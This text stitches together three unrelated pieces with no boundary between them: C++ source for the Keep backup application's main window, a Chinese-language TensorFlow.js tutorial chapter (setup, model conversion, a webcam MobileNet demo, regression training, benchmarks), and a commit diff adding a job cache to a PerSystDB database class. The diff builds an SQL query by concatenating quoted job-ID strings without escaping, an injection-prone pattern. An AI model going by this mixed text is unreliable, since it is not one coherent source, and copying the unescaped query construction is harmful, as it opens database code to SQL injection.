jobidBuilder; jobidBuilder << jobData.jobId; ......@@ -185,7 +207,6 @@ void PerSystSqlOperator::compute(U_Ptr unit, qeJobData& jobData) { agg_info.timestamp = (my_timestamp/1e9); _persystdb->insertInAggregateTable(table_suffix, agg_info); // _persystdb->finalizeConnection(); } } ...... 
@@ -148,6 +148,8 @@ protected:
void compute_internal(U_Ptr& unit, vector<reading_t>& buffer, Aggregate_info_t &agg_info);
double computeSeverityAverage(vector<double> & buffer);
void convertToDoubles(std::vector<reading_t> &buffer, std::vector<double> &douBuffer);
bool execOnStart() override;
void execOnStop() override;
};
double severity_formula1(double metric, double threshold, double exponent);
Barbarian Meets Coding — WebDev, UX & a Pinch of Fantasy. 6 minutes read

AJAX and XMLHttpRequest

This article is part of my personal wiki where I write personal notes while I am learning new technologies. You are welcome to use it for your own learning!

XMLHttpRequest

XMLHttpRequest is a web API that allows you to send/receive HTTP requests from the browser to the server. Sending an HTTP request with XMLHttpRequest consists of these steps:

1. Instantiate an XMLHttpRequest object
2. Open a URL
3. Optionally configure the XMLHttpRequest object and add event handlers for asynchronous HTTP communication. It is better to configure after the XHR is open because some options only work when the XHR is open.
4. Send the request

```js
var result;

// 1. Instantiate object
var xhr = new XMLHttpRequest();

// 2. open url
xhr.open("get", "http://www.myapi.com/api", /* async */ true);

// 3. configure and add event handlers
xhr.onreadystatechange = function(e){
  if (xhr.readyState === 4){ // DONE
    if (xhr.status === 200){
      result = xhr.response;
    } else {
      console.error("Error response: ", xhr.status);
    }
  }
};
xhr.ontimeout = function(e){
  console.error("Request timed-out");
}

// 4. send request
xhr.send();
```

The open method allows you to provide some basic configuration for the XHR request:

```js
open(method, url, async, user, password);
```

The send method lets you send the request with or without data (depending on the type of request):

```js
send();
send(data);
```

Example: Using XHR to get some JSON

See this jsFiddle:

```html
<button id="get-repos">Get Vintharas Repos! in JSON!!</button>
<pre id="response"></pre>
```

```js
console.log('loading event handlers');

var $code = document.getElementById("response");
var $getReposBtn = document.getElementById("get-repos");

$getReposBtn.onclick = function(){
    var xhr = new XMLHttpRequest();
    xhr.timeout = 2000;
    xhr.onreadystatechange = function(e){
        console.log(this);
        if (xhr.readyState === 4){
            if (xhr.status === 200){
                $code.innerHTML = xhr.response;
            } else {
                console.error("XHR didn't work: ", xhr.status);
            }
        }
    }
    xhr.ontimeout = function (){
        console.error("request timedout: ", xhr);
    }
    xhr.open("get", "https://api.github.com/users/vintharas/repos", /*async*/ true);
    xhr.send();
}
```

XMLHttpRequest properties

| Property | Description |
| --- | --- |
| readyState | gets the current state of the XHR object |
| response | gets the response returned from the server according to responseType |
| responseBody | gets the response body as an array of bytes |
| responseText | gets the response body as a string |
| responseType | gets/sets the data type associated with the response, such as blob, text, array-buffer, json, document, etc. By default it is an empty string, which denotes that the response type is string. It is only used when deserializing the body of a response; it doesn't affect the HTTP Accept headers sent to the server. If you set "json", for instance, you get JavaScript objects directly from the "xhr.response" property, whereas if you leave it empty or use "text" you get a text version of the JSON response |
| responseXML | gets the response body as an XML DOM object |
| status | gets the HTTP status code of the response |
| statusText | gets the friendly HTTP status code text |
| timeout | sets the timeout threshold for the request |
| withCredentials | specifies whether the request should include user credentials |
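To make the responseType behavior concrete, here is a small example of my own (the GitHub URL is just for illustration):

```js
var xhr = new XMLHttpRequest();
xhr.open('get', 'https://api.github.com/users/vintharas', /*async*/ true);
xhr.responseType = 'json';       // ask XHR to deserialize the body for us
xhr.onload = function(){
    if (xhr.status === 200){
        // xhr.response is already a parsed object - no JSON.parse needed
        console.log(xhr.response.name);
    }
};
xhr.send();
```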
XMLHttpRequest methods

| Method | Description |
| --- | --- |
| abort | cancels the current request |
| getAllResponseHeaders | gets a complete list of the response headers |
| getResponseHeader | gets a specific response header |
| send | makes the HTTP request and receives the response |
| setRequestHeader | adds an HTTP header to the request |
| open | sets the properties for the request such as URL, username and password |

XMLHttpRequest events

• ontimeout: lets you handle a timeout (having configured the timeout in the XMLHttpRequest object)
• onreadystatechange: lets you handle the event of the state of the XMLHttpRequest changing within these states: [UNSENT, OPENED, HEADERS_RECEIVED, LOADING, DONE]. It is used in async calls.
• upload: helps you track an ongoing upload

AJAX and jQuery

jQuery provides simplified wrappers around the XMLHttpRequest object: $.ajax(), $.get(), $.post(), $.getJSON(), etc.

$.ajax method

The $.ajax method allows you to make async HTTP requests:

```js
$.ajax(url [, settings])
$.ajax([settings]) // all settings are optional, you can set defaults via $.ajaxSetup()
```

A common GET request with $.ajax could be:

```js
var $response = document.getElementById("response");

$.ajax("https://api.github.com/users/vintharas/repos")
  .done(function(data){
      $response.innerHTML = JSON.stringify(data, null, 2);
  });
```

As you can see, the $.ajax method returns a jqXHR object with the Promise interface: the done (success), fail (error), always (complete) and then methods usually available to promises.

$.get

The $.get method is a simplification of the $.ajax method to handle purely GET requests:

```js
$.get([settings]);
$.get(url [, data] [, success] [, dataType])
// it is equivalent to
$.ajax({
  url: url,
  data: data,
  success: success,
  dataType: dataType
})
```

where:

• url is the url to which the request is sent
• data is an object or string to send to the server
• success is a success callback
• dataType is the type of data expected from the server (xml, json, script or html)

This method also returns a jqXHR object that acts as a promise.

$.getJSON

The $.getJSON method is a shorthand for:

```js
$.ajax({
  dataType: "json",
  url: url,
  data: data,
  success: success
})
// it looks like this
$.getJSON(url [, data] [, success])
```

Forms

Sending data to a server using a form — serializing form data with jQuery:
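The original notes stop at the heading above; the usual jQuery approach, as a sketch (the form selector and endpoint here are made up for illustration):

```js
var $form = $('#my-form');                     // hypothetical form id
$.post('/api/things', $form.serialize())      // serialize() encodes the fields as a query string
  .done(function(data){
      console.log('saved!', data);
  });
```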
1. There's always a pit to fall into

As someone who has been using Kotlin for two years, lately I just can't help myself: all sorts of Java code keeps turning into Kt under my hands, and that's how I keep discovering more fun stuff~

So, there is a framework called Retrofit, and it has a thing called CallAdapter, one of whose RxJava implementations has a class extend AtomicInteger to store a thread-safe state value. If you're curious, go look at the class: CallArbiter.java

As for me, in my spare time I've been writing a Retrofit-style project called RetroApollo. It mainly wraps the Apollo-Android project so that GraphQL APIs are more convenient to call — and that involves supporting RxJava too.

So I thought: I'll write my own CallArbiter, just in Kotlin. Obviously, going by past experience, Kotlin would be no problem at all, right? And then I got stuck at the very first step:

```kotlin
class CallArbiter: AtomicInteger { // Error! You have three methods to implement!
    constructor(initialValue: Int) : super(initialValue)
    constructor() : super()
}
```

I would never have guessed that this snippet could fail to compile, and the error message is a bit of a joke:

Error:(8, 1) Kotlin: Class 'CallArbiter' must be declared abstract or implement abstract base class member public abstract fun toByte(): Byte defined in java.util.concurrent.atomic.AtomicInteger

How does that make any sense? AtomicInteger is itself a concrete class — where would unimplemented methods come from? And although the error complains about a missing toByte implementation, a closer look shows that toShort and toChar are "unimplemented" as well...

2. And this pit runs deep

I thought it was pulling my leg — after all, I searched AtomicInteger and its parent class Number up and down and found no toByte method anywhere.

But the method name looked awfully familiar: every number in Kotlin seems to have it, doesn't it? Digging into the Kotlin source, it turns out Kotlin has its own abstract class called Number!

```kotlin
public abstract class Number {
    public abstract fun toDouble(): Double
    public abstract fun toFloat(): Float
    public abstract fun toLong(): Long
    public abstract fun toInt(): Int
    public abstract fun toChar(): Char
    public abstract fun toShort(): Short
    public abstract fun toByte(): Byte
}
```

So could those so-called unimplemented abstract methods all come from this Number? Do we even need to guess? Of course they do. But that's still odd: AtomicInteger extends java.lang.Number — what's the relationship between these two Numbers?

3. The reveal

Quite a while ago I wrote an article, "Why IntArray instead of Array<Int>?", about how Kotlin types map to Java types — and here we've run into the same thing.

kotlin.Number is mapped to java.lang.Number after compilation. In other words, in Kotlin, AtomicInteger is considered a subclass of kotlin.Number — and, as it happens, methods like toByte have no concrete implementation in either AtomicInteger or java.lang.Number, which is what produces the situation above.

There's still a question, though: java.lang.Number has methods like doubleValue — how do they relate to Kotlin's toDouble?

Let's define a class extending Kotlin's Number:

```kotlin
class MyNumber: Number(){
    override fun toByte(): Byte { ... }
    override fun toChar(): Char { ... }
    override fun toDouble(): Double { ... }
    override fun toFloat(): Float { ... }
    override fun toInt(): Int { ... }
    override fun toLong(): Long { ... }
    override fun toShort(): Short { ... }
}
```

Compile it and look at the bytecode: the compiler automatically synthesizes the corresponding java.lang.Number methods for us, for example doubleValue:

```
// access flags 0x51
public final bridge doubleValue()D
L0
LINENUMBER 19 L0
ALOAD 0
INVOKEVIRTUAL test/TestNumber.toDouble ()D
DRETURN
MAXSTACK = 2
MAXLOCALS = 1
```

And this doubleValue simply turns around and calls toDouble!

Fine — what about the toByte that caused all the trouble? Same story: a synthesized method called byteValue that calls toByte.

But wait, there's a problem! Java's Number does have an implementation of byteValue! Doesn't this throw the original implementation away?

java.lang.Number:

```java
public byte byteValue() {
    return (byte)intValue();
}
```

Yep — gone. Besides byteValue there's also shortValue; in Java both of them default to calling intValue, but Kotlin requires them (toByte/toShort) to be implemented separately, so to inherit from AtomicInteger we have to implement those two methods ourselves.

As for toChar, Java's Number has no corresponding charValue, so we have to implement that one ourselves as well.

4. Wrap-up

From the discussion above, we can see there are all kinds of type and method mappings between Kotlin and Java. To stay compatible with Java while keeping its own distinctive style, Kotlin clearly has no choice but to do this — and compared with other languages, it does it rather well.

As for the problem we ran into: logically, AtomicInteger shouldn't be open at all. Inheriting from it gains us nothing over composing it as a component — and for a problem that composition can solve, inheritance shouldn't be used. In other words, the correct way to write the code at the top of this article is:

```kotlin
class CallArbiter<T>{

    val atomicState = AtomicInteger(STATE_WAITING)

    ...
}
```

Follow the public account "Kotlin" for the latest Kotlin news.
Guide through Magento's timezones

I'll guide you through Magento's timezone behavior, as I've noticed that people tend to get confused in cases when they have 2 or more websites with different timezones. If this is what you are searching for, read on!

First of all, let's start with the web server – Magento relation, and their times.

Web server – Magento relation

Let's look at the following scenario. You want an online store – OK, you'll need web hosting for it (on some web hosting provider's server). With classic low-level PHP development, people tend to overlook the server's settings, and each server has its own time and timezone set. If you overlook that, each time your script executes any time function it will take the server time as the actual one. So the first thing you need to look at is the server's location and its time zone.

In the case of Magento, the situation is a bit different. Let's take a look at index.php (the first PHP file executed on the server):

```php
Mage::run($mageRunCode, $mageRunType);
```

That line starts Magento initialization. Now, let's move forward, to the app/Mage.php file. In there, you'll find this:

```php
self::$_app->run(array(
    'scope_code' => $code,
    'scope_type' => $type,
    'options'    => $options,
));
```

After we trace it a bit more, we'll come across this method:

```php
//File: "app/code/core/Mage/Core/Model/App.php"
/**
 * Initialize PHP environment
 *
 * @return Mage_Core_Model_App
 */
protected function _initEnvironment()
{
    $this->setErrorHandler(self::DEFAULT_ERROR_HANDLER);
    //Sets the default timezone used by all date/time functions in a script
    //Mage_Core_Model_Locale::DEFAULT_TIMEZONE = 'UTC' by default
    date_default_timezone_set(Mage_Core_Model_Locale::DEFAULT_TIMEZONE);
    return $this;
}
```

So Magento sets the script's default timezone to UTC, regardless of the server's own setting — meaning each Magento store (database-wise) is synced to UTC. Someone might ask why we should do this, and why we wouldn't just set it to a timezone that suits our needs. Well, it's a good question – but the answer is better: if you have your Magento installation on a cloud, for example, or even on some cluster, it will help with cross-server synchronization, as "UTC stands for Coordinated Universal Time" and pretty much every server configuration considers that the default if not set otherwise.

Now, this explains how Magento gets / calculates its timezone. Moving on to

Magento per-store timezone settings

If you navigate to "System->Configuration->General->Locale Options->Timezone" in the Admin area of Magento, you'll see that you can change the Timezone for each Website you have. This way you get a way to have stores for each part of the world set with the correct timezone.
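If you need to read that configured timezone (or the store-local time) from your own code, here's a quick sketch of my own — the config path matches the XML_PATH_DEFAULT_TIMEZONE constant used in the core code quoted below:

```php
<?php
// Timezone configured for a specific store view, e.g. "Europe/Zagreb"
$timezone = Mage::getStoreConfig('general/locale/timezone', $storeId);

// Current time in that store's timezone, as a Zend_Date instance
$storeNow = Mage::app()->getLocale()->storeDate($storeId, null, true);
```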
Here’s a method used to fetch current time per store (Zend_Date instance): //File: "app/code/core/Mage/Core/Model/Locale.php" /** * Create Zend_Date object with date converted to store timezone and store Locale * * @param mixed $store Information about store * @param string|integer|Zend_Date|array|null $date date in UTC * @param boolean $includeTime flag for including time to date * @return Zend_Date */ public function storeDate($store=null, $date=null, $includeTime=false) { $timezone = Mage::app()->getStore($store)->getConfig(self::XML_PATH_DEFAULT_TIMEZONE); $date = new Zend_Date($date, null, $this->getLocale()); $date->setTimezone($timezone); if (!$includeTime) { $date->setHour(0) ->setMinute(0) ->setSecond(0); } return $date; } Or if you need string representation, just use this: /** * Date and time format codes */   /* const FORMAT_TYPE_FULL = 'full'; const FORMAT_TYPE_LONG = 'long'; const FORMAT_TYPE_MEDIUM= 'medium'; const FORMAT_TYPE_SHORT = 'short'; */   Mage::helper('core')->formatTime($time=null, $format='short', $showDate=false);   //Or "$this->helper('core')->formatTime($time=null, $format='short', $showDate=false);" Front-end and Back-end views On back-end you’ll always see times shown as configured on “System->Configuration->General->Locale Options->Timezone” for “Default” scope (usually set to Admin’s timezone). Example where you can see tis is on order views page. And each time shown on front-end will be shown as configured on same place, but on website scope. Although there aren’t may places on front-end where exact time is shown, it’s important for dates (if you have limited time offers for example), or for Cron tasks set for specific stores (newsletter sending etc.). Conclusion As I’ve mentioned at the very beginning of this article. This all applies to single-store setup as well, but it is of a HUGE importance if you have multi-store setup. If it’s set incorrectly it might lead to some “ghost bugs”, and it’s quite hard to trace – especially if you (developer) don’t understand how exactly it works. I hope I’ve cleared few things here. And thanks for reading! P.S. If you notice some strange behavior of time related stuff, please submit it here to comments! 4 comments 1. I am having the same issue with my custom dashboard. Why would they not at least store the local timezone date in the DB. Please help us Inchoo this is taking away from my sleep :). 2. Hi there. I’ve added a new datetime column at sales_flat_order, but everytime a new registry is inserted, it is shown 3 hours less than the real time. So, when seeing my sales order grid the time appears wrong, but when see it on the sales order view on html, getting the value from db, it looks good. =/ My timezone at the config is ok, and also at php.ini. Do you know what it could be wrong? Thanks 1. I guess this is because Magento messes up its own timezone behaviour. I am currently fighting against the Log Module. Sometimes the now() $this->setData('last_visit_at', now()); method is used and sometime the GMT $data = new Varien_Object(array( 'quote_id' => (int) $visitor->getQuoteId(), 'visitor_id' => (int) $visitor->getId(), 'created_at' => Mage::getSingleton('core/date')->gmtDate() )); is used. And overall Magento stores everthing as TIMESTAMP without checking the mysql timezone settings. So we have a UTC time that goes to a timestamp (thats internally is UTC) that will be treated as local time by mysql. Why could not simply use sql NOW() for that? MySQL stores as UTC and everthing would be fine. 
    If Magento needs UTC it can load it via SQL: CONVERT_TZ(`timestamp_field`, @@session.time_zone, '+00:00') AS `utc_datetime`. I am really pissed off because a lot of the statistics are simply garbage.
Wildcard extending final Optional class

The Optional class is declared as final in Java. Nevertheless, it contains two methods, flatMap and or, with the following signatures:

```java
public <U> Optional<U> flatMap​(Function<? super T,​ ? extends Optional<? extends U>> mapper)
```

and

```java
public Optional<T> or​(Supplier<? extends Optional<? extends T>> supplier)
```

Optional can never be extended, so what is the point of the parts like ? extends Optional<...> in these signatures? Why not just Optional<...>?

From answers to a similar question here about the final String class, I only understood that the compiler doesn't have to reject such constructs. I agree with that, considering the examples that were given. But my question is rather focused on API design, not on the compiler's ability to predict all possible use cases. Why did someone ever need to allow for the possibility of, for example, a Supplier that yields instances of some impossible class extending Optional?

Answer

The class Optional is final, hence cannot have subclasses, but it is generic, hence allows an infinite number of parameterized types that have subtyping relationships of their own. For example, the following code is only valid due to the signature you've shown in the question:

```java
Optional<Object> o = Optional.empty();
Supplier<Optional<String>> s = () -> Optional.of("str");
Optional<Object> combined = o.or(s);
```

An Optional<String> is not a subtype of Optional<Object>, so Optional<? extends T> is required in the signature, as an Optional<String> is a subtype of Optional<? extends Object>. But a Supplier<Subtype> is not a subtype of Supplier<Supertype>, so we need Supplier<? extends Supertype> to accept a supplier of a subtype — and the supertype here is Optional<? extends T>. So Supplier<Optional<String>> is a subtype of Supplier<? extends Optional<? extends Object>>.
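To make the variance concrete, here is a small compilable illustration of my own (not from the original answer; note Optional.or requires Java 9+):

```java
import java.util.Optional;
import java.util.function.Supplier;

public class OrDemo {
    public static void main(String[] args) {
        Optional<Object> o = Optional.empty();
        Supplier<Optional<String>> s = () -> Optional.of("str");

        // Compiles thanks to Supplier<? extends Optional<? extends T>>:
        Optional<Object> combined = o.or(s);

        // With a hypothetical signature or(Supplier<Optional<T>> supplier),
        // the call o.or(s) would be rejected, because Supplier<Optional<String>>
        // is not a Supplier<Optional<Object>> - generics are invariant.
        System.out.println(combined.isPresent());
    }
}
```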
[Screenshot of the check50 output]

When I check50 mario.c I get the message "Ensure you have the required files before submitting." But I'm sure I have the required file. What did I do wrong?

Answer:

The directory is wrong. You are supposed to call check50 from the directory where mario.c is located. So cd into ~/workspace/pset1/mario/less and try it again.

BTW, this looks like a solution to mario.more, not mario.less. mario.more does not expect spaces at the end of the lines!
Is there any conditional structure we can use in a button command?

I'm trying to change the creation date based on the modification date in several files. I have to set creation date = modification date only if the creation date is newer, because I've found strange things like a file modified before it was even created (issues with copying files, changing metadata, etc.). In those cases I have to set the creation date based on the modification date. For this I need an if-then-else structure. The pseudo-code on a button would be something like this (if the creation date is newer than the modification date, then set creation = modification date; otherwise leave it as it is):

```
If META createdate > META modifydate
    SetAttr META createdate:modifydate
End If
```

Thanks in advance!

Scripting is what you want.
Modding Discussion: want to make a modded dungeon

Discussion in 'Starbound Modding' started by KRANOT, Apr 8, 2017.

1. KRANOT (Big Damn Hero)

So I wanted to add a dungeon to a mod I am working on — how exactly do I do this? Like, how do I make it so that an area on a planet is the dungeon, how do I package that in a mod, how do I protect the blocks so players don't cheat, how do I spawn enemies? Are there any guides that can answer these questions?

2. Sparklink (Pangalactic Porcupine)

First you are going to need a map editor; I use Tiled for all of my map making. There is also a great guide to using Tiled on Starbounder written by the person who made the Starbound dungeons. Then you will have to patch your dungeon into the terrestrial_worlds.config like this:

```
[
  {
    "op": "add",
    "path": "/planetTypes/forest/layers/surface/dungeons/-",
    "value": [ 1.0, "{dungeon name here}" ]
  }
]
```

planetTypes/ determines the biome it will appear in. layers/ determines where on a type of planet it will appear (on the surface, underground, in the atmosphere). If you want to make your dungeon appear on more than one type of planet you will have to write the example I have up there for every biome.

3. projectmayhem (Ketchup Robot)

I'm following that Tiled guide you linked, and after downloading the example mission and putting it in the mods folder, when I try to open the JSON in Tiled, it says "Tile used but no tilesets specified". Any idea why?

4. Sparklink (Pangalactic Porcupine)

While I cannot figure out why it says it can not find any specified tile sets, I have found that it is fixed by placing the .json file into the dungeons folder in your unpacked assets.

5. projectmayhem (Ketchup Robot)

I moved the whole examplemissions folder over, but it still says the same thing.

6. Sparklink (Pangalactic Porcupine)

Move only the .json file. Sorry about being unclear.

7. projectmayhem (Ketchup Robot)

I tried that first. It didn't work. So... here is what I figured I would try: I went into the unpacked assets and copied dungeons/other/museum.json and its dungeon file. I tried opening it and I get the same error. I can open the museum file in the unpacked assets just fine, but not if I copy it and move it to my mods folders — I get that same "tileset not specified" error. I noticed this at the bottom of the JSON...
Code:

```
"tilesets":[
  { "firstgid":1,    "source":"..\/..\/..\/tilesets\/packed\/materials.json" },
  { "firstgid":191,  "source":"..\/..\/..\/tilesets\/packed\/supports.json" },
  { "firstgid":227,  "source":"..\/..\/..\/tilesets\/packed\/miscellaneous.json" },
  { "firstgid":247,  "source":"..\/..\/..\/tilesets\/packed\/liquids.json" },
  { "firstgid":275,  "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/generic.json" },
  { "firstgid":2039, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/apex.json" },
  { "firstgid":2407, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/avian.json" },
  { "firstgid":2711, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/floran.json" },
  { "firstgid":2906, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/glitch.json" },
  { "firstgid":3131, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/human.json" },
  { "firstgid":3410, "source":"..\/..\/..\/tilesets\/packed\/objects-by-race\/hylotl.json" },
  { "firstgid":3641, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/decorative.json" },
  { "firstgid":4941, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/door.json" },
  { "firstgid":5057, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/furniture.json" },
  { "firstgid":5383, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/light.json" },
  { "firstgid":5800, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/pot.json" },
  { "firstgid":6097, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/storage.json" },
  { "firstgid":6315, "source":"..\/..\/..\/tilesets\/packed\/objects-by-category\/teleporter.json" }],
```

I assume that points to the tilesets. I don't know much about JSON, so no idea how to read those paths. Do any of them need changing?

8. Sparklink (Pangalactic Porcupine)

Yes, those point to the tilesets that you build with. If the examplemission.json from the tutorial doesn't work, you can probably swap it out for the blank template dungeon that is in the dungeons folder; all you need to do is simply copy it and rename it.

9. projectmayhem (Ketchup Robot)

OK, I think I may have figured out what's wrong. I made my own custom map, just threw some dirt on it, then saved it. When I open up the JSON, the paths look like this...

"source":"..\/..\/..\/assets\/packed\/tilesets\/packed\/materials.json"

So if I add /assets\/packed\ before the tilesets on the other JSON, it should open. Going to try that now.

10. projectmayhem (Ketchup Robot)

Well wait... if I specifically set it to look in the unpacked assets, it won't work for people who haven't unpacked the assets, will it? *edit* Or does the "packed" in the file path mean the packed.pak file? In the tutorial it said to make sure your unpacked assets folder is renamed to "packed". Mine was called _unpacked when I first unpacked it.

11. projectmayhem (Ketchup Robot)

I can get the copied museum file to load if I put it in my dungeon folder, with the path ..\/..\/..\/assets\/packed\/tilesets\/packed\tilesetname.json — but will it still work for everyone else?

12. Sparklink (Pangalactic Porcupine)

The tiles and objects placed are saved and should work across all who use the mod.

13. projectmayhem (Ketchup Robot)

Ok, thank you :) Gonna try making a custom instanced area, accessible from the ship's tech station panel. I think I saw a tutorial for that somewhere. Then hopefully, change my custom quest from auto-complete to "must turn in" at an NPC inside the instance.
Hopefully it goes well!   14. projectmayhem projectmayhem Ketchup Robot Hmm... made it simple, just the outline of the building, one NPC, a teleporter and the Player Start. I got this error message "Caused by: (MapException) Key 'default' not found in Map::get()" Any idea what that means? tried looking on forums but all I found was an old old old post that didnt help. **edit** I used the /warp instanceworld:jeditemple to get there, not sure if that matters. I wasn't sure if you had to do anything special to make your area an instanced world. Do I have to add tags anywhere in the JSON?   15. Sparklink Sparklink Pangalactic Porcupine Did you make sure that the instance_worlds.config.patch, the dungeon_worlds.config.patch and the .dungeon files were all correct? The .dungeon should properly refer to the .json file and the instance and dungeon worlds should refer to the .dungeon file correctly.   16. projectmayhem projectmayhem Ketchup Robot Yeah, they are fine. I went ahead and recopied the museum files, renamed them and repathed the tilesets. Its letting me go into it fine, so I'm just going to redesign it, and go from there. I can't find any info on adding a warp/mission to the tech station. Do you know any tutorial or file I can look at it get pointed in the right way?   17. projectmayhem projectmayhem Ketchup Robot I think I have most everything now. I just gotta learn how to make picking up my Kyber Crystal activate the mission on the AI Tech Station.   18. projectmayhem projectmayhem Ketchup Robot Ok the only issues I am having now, is looking in the LUA file, im trying to edit it to suit my needs and learn a little about what I'm doing. There is a line in the humanmission1.lua that says self.mechanicUid = config.getParameter("mechanicUid") and then it's referenced later on with local findMechanic = util.uniqueEntityTracker(self.mechanicUid, self.compassUpdate) So, what file do I need to look at to learn about the Uid and where it gets set. I have some NPC's in my jedi temple, I just need to learn how to set one of them as the turn in NPC with this Uid right? *Edit* That came out wrong, I know where you set the Uid, I have it in my jeditemple.questtemplate "jediUid" : "jediknight", I just don't know where to go to set one of my NPC as "jediknight" **Edit Again** Ok, After posting this I had an idea and I think it turned right. In the human mission the shipyardcaptain is the turn in, and I been looking through NPC files for him and mission files and all that..but he is in the objects file. So, going to make a jediknight object and try to get the quest to turn in to him ***Yet Another Edit*** I guess in order to get the Jedi Knight Object into the map, I would have to learn how to make a new tileset, to upload to the Tiled   Last edited: Apr 17, 2017 Share This Page
__label__pos
0.729
... View Full Version : recursion function problem o0O0o.o0O0o 01-23-2008, 12:51 AM hi i am using recursion function to display the tree based menu. Initially i was echoing it line by line and it worked fine but now i want to append the output to variable function (parentid , depth) { $display . = ... function(parentid,depth) ...... } Now i want is that when the function finishes it returns the ouput But how can i made the check that function has reached the last menu and now it should return the $display not anywhere in between Fou-Lu 01-23-2008, 02:03 AM Not sure what you are looking at doing, since you don't have any conditional control in your example. At the 'end' of a function you return the result, once it reaches the end the recursive 'stack', it will step up each time and return the result. Generally if you want to return a result from a recursive function you would append a result from a function call within the function, or run against a static variable. For example: function recurseSomething($something) { $result = ''; if (is_array($something)) { foreach($something AS $nothing) { $result .= recurseSomething($nothing); } } else if (is_string($something)) { $result .= strtoupper($something); } return $result; } Recursion is all about the conditions you have placed upon it. Without knowing that, I can't really recommend exactly what you should do to preform a result. Remember, you can always run against a static variable which is a reference to a calling scoped variable - that will actually eliminate your need to perform a return. EZ Archive Ads Plugin for vBulletin Copyright 2006 Computer Help Forum
__label__pos
0.64183
Period of a Function

Tool to compute the period of a function. The period of a function is the smallest value t such that the function repeats itself: f(x+t) = f(x-t) = f(x), which is the case for trigonometric functions (cos, sin, etc.).

Answers to Questions

What is the period of a function? (Definition)

The period $ t $ of a periodic function $ f(x) $ is the value $ t $ such that $$ f(x+t)=f(x) $$

Graphically, its curve repeats itself every period, by translation. The function is equal to itself every length $ t $ (it shows a pattern that repeats by translation). The value of the period $ t $ is also called the periodicity of the function.

How to find the period of a function?

To find the period $ t $ of a periodic function $ f(x) $, show that $$ f(x+t)=f(x) $$

Example: For the trigonometric function, $ \sin(x + 2\pi) = \sin(x) $, so $ \sin(x) $ is periodic with period $ 2\pi $

Trigonometric functions are generally periodic with period $ 2\pi $; to guess the value of $ t $, try multiples of pi for the value $ t $.

If the period is zero (equal to $ 0 $), then the function is not periodic.

How to find the value f(x) of a periodic function?

Any periodic function with period $ t $ repeats every $ t $ values. To predict the value of a periodic function at a value $ x $, compute $ x_t = x \mod t $ (modulo t) and look up the known value of $ f(x_t) = f(x) $

Example: The function $ f(x) = \cos(x) $ has a period of $ 2\pi $; the value at $ x = 9\pi $ is the same as at $ x \equiv 9\pi \mod 2\pi \equiv \pi \mod 2\pi $, and so $ \cos(9\pi) = \cos(\pi) = -1 $

How to find the amplitude of a function?

The amplitude is the absolute value of the non-periodic part of the function.

Example: $ a \sin(x) $ has amplitude $ | a | $

How to prove that a function is not periodic?

If $ f $ is periodic then there exists a nonzero real number $ t $ such that $$ f(x+t)=f(x) $$ The proof consists of showing that this is impossible — for example through a proof by contradiction, or by carrying out a computation that leads to a contradiction.

What are the usual periodic functions?

The most common periodic functions are the trigonometric functions built on sine and cosine (which have a period of 2π).

Period of sine $ \sin(x) $: $ 2\pi $
Period of cosine $ \cos(x) $: $ 2\pi $
Period of tangent $ \tan(x) $: $ \pi $
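As a quick worked example in the same spirit (added here for illustration, not from the original page): for $ f(x) = \sin(2x) $, $$ \sin(2(x+\pi)) = \sin(2x+2\pi) = \sin(2x) $$ so the period is $ t = \pi $ — scaling the argument by a factor divides the period by that same factor.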
Source code

dCode retains ownership of the 'Period of a Function' source code. Except where an explicit open-source licence is indicated (CC / Creative Commons / free), no algorithm, applet or snippet (converter, solver, encryption/decryption, encoding/decoding, translator) or function coded in any programming language (PHP, Java, C#, Python, Javascript, Matlab, etc.), nor any data, script or API access, will be released for free — likewise for downloading 'Period of a Function' for offline use on PC, tablet, or an iPhone or Android app.

Source: https://www.dcode.fr/periode-fonction
© 2021 dCode — The indispensable 'toolbox' for solving games, riddles, geocaches and CTFs.
What would be the MQL query if I want to search for a property that has a particular string either in its name or its actual link path? For the name, I was able to use ~= matching on the name property, but not on the link path. I tried to use ~= on the id, but it says we cannot do matching on the id.

```
[{
  "/type/object/id": "wikipedia",
  "name~=": "wikipedia",
  "/type/object/type": "/type/property",
  "/type/object/name": null,
  "limit": 200
}]
```

Is there a way to also search for strings in the id?

1 Answer (accepted)

A couple of things:

• the ~= operator works on a whole-word basis, so if you want to find the string "wikipedia" in all contexts, you'll want to use "*wikipedia*"
• IDs aren't stored as fully formed paths; instead they're a sequence of keys in their respective namespaces (think filenames in directories)

You'll need two separate queries to match both the properties and their containing domains, since you can't do unions like that in MQL.

For properties whose names contain wikipedia:

```
[{
  "type": "/type/property",
  "name~=": "*wikipedia*",
  "name": null,
  "id": null,
  "limit": 200
}]
```

and for properties which belong to types whose IDs contain wikipedia:

```
[{
  "type": "/type/property",
  "name": null,
  "id": null,
  "schema": {"key": {"namespace": {"name~=": "*wikipedia*"}}, "id": null},
  "limit": 200
}]
```

That second query may need a little refinement, but it should give you the basic idea.

Comments:
• If the original comment about wildcards didn't make any sense, it's because the markup ate my asterisks. I've restored them to the text. – Tom Morris, Nov 28 '12 at 22:04
• Thanks Tom! that helps. – Abhishek Shivkumar, Nov 29 '12 at 4:45
W3cubDocs / SVG

width

This attribute indicates a horizontal length in the user coordinate system. The exact effect of this coordinate depends on each element. Most of the time, it represents the width of the rectangular region of the reference element (see each individual element's documentation for exceptions).

This attribute must be specified, except for the <svg> element where the default value is 100% (except for root <svg> elements that have HTML parents), and the <filter> and <mask> elements where the default value is 120%.

Usage context

<length>

A length is a distance measurement, given as a number along with a unit. Lengths are specified in one of two ways. When used in a stylesheet, a <length> is defined as follows:

```
length ::= number (~"em" | ~"ex" | ~"px" | ~"in" | ~"cm" | ~"mm" | ~"pt" | ~"pc")?
```

